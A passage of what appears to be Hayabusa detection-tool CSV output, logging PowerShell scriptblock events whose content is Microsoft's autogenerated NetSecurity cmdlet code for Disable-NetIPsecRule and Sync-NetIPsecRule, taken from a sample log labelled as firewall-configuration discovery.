[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(Par",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) 
$__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,", ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; 
Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] 
${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 